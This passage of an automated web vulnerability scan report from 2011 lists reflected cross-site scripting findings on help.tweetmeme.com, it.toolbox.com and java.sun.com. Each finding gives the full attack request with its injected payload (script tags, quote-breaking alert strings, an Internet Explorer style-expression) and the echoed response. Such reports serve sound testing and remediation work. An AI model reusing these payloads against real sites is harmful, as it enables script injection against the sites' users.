Severity:   High
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /forum

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e562a"><script>alert(1)</script>99f9c1b1735 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e562a\"><script>alert(1)</script>99f9c1b1735 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /forum?e562a"><script>alert(1)</script>99f9c1b1735=1 HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US">
<head>
   <meta http-equiv="Content-Type
...[SNIP]...
<input type="hidden" name="redirect_to" value="/forum/?e562a\"><script>alert(1)</script>99f9c1b1735=1"/>
...[SNIP]...

4.95. http://help.tweetmeme.com/forum/forum/33 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /forum/forum/33

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f738"><script>alert(1)</script>0141cb18ee4 was submitted in the REST URL parameter 1. This input was echoed as 9f738\"><script>alert(1)</script>0141cb18ee4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forum9f738"><script>alert(1)</script>0141cb18ee4/forum/33 HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 15:03:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=a8229kumo17amruah44grvptv2; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Last-Modified: Tue, 25 Jan 2011 15:03:54 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="redirect_to" value="/forum9f738\"><script>alert(1)</script>0141cb18ee4/forum/33"/>
...[SNIP]...

4.96. http://help.tweetmeme.com/forum/forum/33 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /forum/forum/33

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 393ca"><script>alert(1)</script>7d3c1bd86b was submitted in the REST URL parameter 2. This input was echoed as 393ca\"><script>alert(1)</script>7d3c1bd86b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forum/forum393ca"><script>alert(1)</script>7d3c1bd86b/33 HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 15:04:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Content-Length: 5493
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US">
<head>
   <meta http-equiv="Content-Type
...[SNIP]...
<input type="hidden" name="redirect_to" value="/forum/forum393ca\"><script>alert(1)</script>7d3c1bd86b/33"/>
...[SNIP]...

4.97. http://help.tweetmeme.com/forum/forum/33 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /forum/forum/33

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67758"><script>alert(1)</script>39ac6fd433d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 67758\"><script>alert(1)</script>39ac6fd433d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forum/forum/33?67758"><script>alert(1)</script>39ac6fd433d=1 HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Content-Length: 6418
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US">
<head>
   <meta http-equiv="Content-Type
...[SNIP]...
<input type="hidden" name="redirect_to" value="/forum/forum/33?67758\"><script>alert(1)</script>39ac6fd433d=1"/>
...[SNIP]...

4.98. http://help.tweetmeme.com/language/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /language/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1c8d"><script>alert(1)</script>cecec83a76b was submitted in the REST URL parameter 1. This input was echoed as d1c8d\"><script>alert(1)</script>cecec83a76b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /languaged1c8d"><script>alert(1)</script>cecec83a76b/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 15:03:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=d2p69qb6bfvb1r9mgfk42ek456; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Last-Modified: Tue, 25 Jan 2011 15:03:36 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="redirect_to" value="/languaged1c8d\"><script>alert(1)</script>cecec83a76b/"/>
...[SNIP]...

4.99. http://help.tweetmeme.com/language/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /language/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf3ca"><script>alert(1)</script>0e9f8580517 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf3ca\"><script>alert(1)</script>0e9f8580517 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /language/?bf3ca"><script>alert(1)</script>0e9f8580517=1 HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=tlgt0pm327qnihddeunb2kgsb5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="redirect_to" value="/language/?bf3ca\"><script>alert(1)</script>0e9f8580517=1"/>
...[SNIP]...

4.100. http://it.toolbox.com/blogs/database-soup [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/database-soup

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d69a7'-alert(1)-'c1a27e37df1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/database-soup?d69a7'-alert(1)-'c1a27e37df1=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61207
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:05:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Database So
...[SNIP]...
aBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddatabase-soup%26d69a7'-alert(1)-'c1a27e37df1%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

4.101. http://it.toolbox.com/blogs/database-talk [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/database-talk

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0d02'-alert(1)-'7a9deb3bef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/database-talk?a0d02'-alert(1)-'7a9deb3bef=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63474
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:01:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Database Ta
...[SNIP]...
aBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddatabase-talk%26a0d02'-alert(1)-'7a9deb3bef%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

4.102. http://it.toolbox.com/blogs/db2luw [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/db2luw

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f251b'-alert(1)-'af2755a203c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/db2luw?f251b'-alert(1)-'af2755a203c=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62990
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:01:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   An Expert's
...[SNIP]...
r != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddb2luw%26f251b'-alert(1)-'af2755a203c%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

4.103. http://it.toolbox.com/blogs/db2zos [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/db2zos

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6998'-alert(1)-'a4d3ae29ef8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/db2zos?a6998'-alert(1)-'a4d3ae29ef8=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78422
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:01:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Getting the
...[SNIP]...
r != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddb2zos%26a6998'-alert(1)-'a4d3ae29ef8%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

4.104. http://it.toolbox.com/blogs/elsua [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/elsua

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1a8f'-alert(1)-'473f3fe4b3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/elsua?e1a8f'-alert(1)-'473f3fe4b3a=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 64515
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:01:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   elsua: The
...[SNIP]...
er != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3delsua%26e1a8f'-alert(1)-'473f3fe4b3a%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

4.105. http://it.toolbox.com/blogs/juice-analytics [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/juice-analytics

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 602f7'-alert(1)-'c16e07e8cc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/juice-analytics?602f7'-alert(1)-'c16e07e8cc1=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61930
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:02:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Juice Analy
...[SNIP]...
tnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3djuice-analytics%26602f7'-alert(1)-'c16e07e8cc1%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

4.106. http://it.toolbox.com/blogs/minimalit [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/minimalit

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fa7d'-alert(1)-'426dac5f4eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/minimalit?6fa7d'-alert(1)-'426dac5f4eb=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 60162
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:03:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Minimal IT:
...[SNIP]...
= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dminimalit%266fa7d'-alert(1)-'426dac5f4eb%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

4.107. http://it.toolbox.com/blogs/penguinista-databasiensis [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/penguinista-databasiensis

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47ced'-alert(1)-'96af22e58e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/penguinista-databasiensis?47ced'-alert(1)-'96af22e58e=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 46114
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:02:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Penguinista
...[SNIP]...

{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dpenguinista-databasiensis%2647ced'-alert(1)-'96af22e58e%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

4.108. http://it.toolbox.com/blogs/ppmtoday [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 306f2'-alert(1)-'2382eb5920b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63706
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:01:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
!= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26306f2'-alert(1)-'2382eb5920b%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

4.109. http://java.sun.com/products/plugin/autodl [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://java.sun.com
Path:   /products/plugin/autodl

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9722"style%3d"x%3aexpression(alert(1))"ce67ab2234b was submitted in the REST URL parameter 1. This input was echoed as f9722"style="x:expression(alert(1))"ce67ab2234b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /productsf9722"style%3d"x%3aexpression(alert(1))"ce67ab2234b/plugin/autodl HTTP/1.1
Host: java.sun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 25 Jan 2011 15:09:47 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sun Microsystems</title>
<!-- BEGIN METADATA -->
<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<a href="/contact/feedback.jsp?
referer=http://java.sun.com/notfound.jsp
&requrl=http://java.sun.com/productsf9722"style="x:expression(alert(1))"ce67ab2234b/plugin/autodl
&refurl=http://java.sun.com/UserTypedUrl
&category=se">
...[SNIP]...

4.110. http://java.sun.com/products/plugin/autodl [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://java.sun.com
Path:   /products/plugin/autodl

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 491eb"style%3d"x%3aexpression(alert(1))"2f39587331b was submitted in the REST URL parameter 2. This input was echoed as 491eb"style="x:expression(alert(1))"2f39587331b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/plugin491eb"style%3d"x%3aexpression(alert(1))"2f39587331b/autodl HTTP/1.1
Host: java.sun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 25 Jan 2011 15:10:32 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sun Microsystems</title>
<!-- BEGIN METADATA -->
<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<a href="/contact/feedback.jsp?
referer=http://java.sun.com/notfound.jsp
&requrl=http://java.sun.com/products/plugin491eb"style="x:expression(alert(1))"2f39587331b/autodl
&refurl=http://java.sun.com/UserTypedUrl
&category=se">
...[SNIP]...

4.111. http://java.sun.com/products/plugin/autodl [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://java.sun.com
Path:   /products/plugin/autodl

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cda2"style%3d"x%3aexpression(alert(1))"ceeb973e53 was submitted in the REST URL parameter 3. This input was echoed as 2cda2"style="x:expression(alert(1))"ceeb973e53 in the application's response.

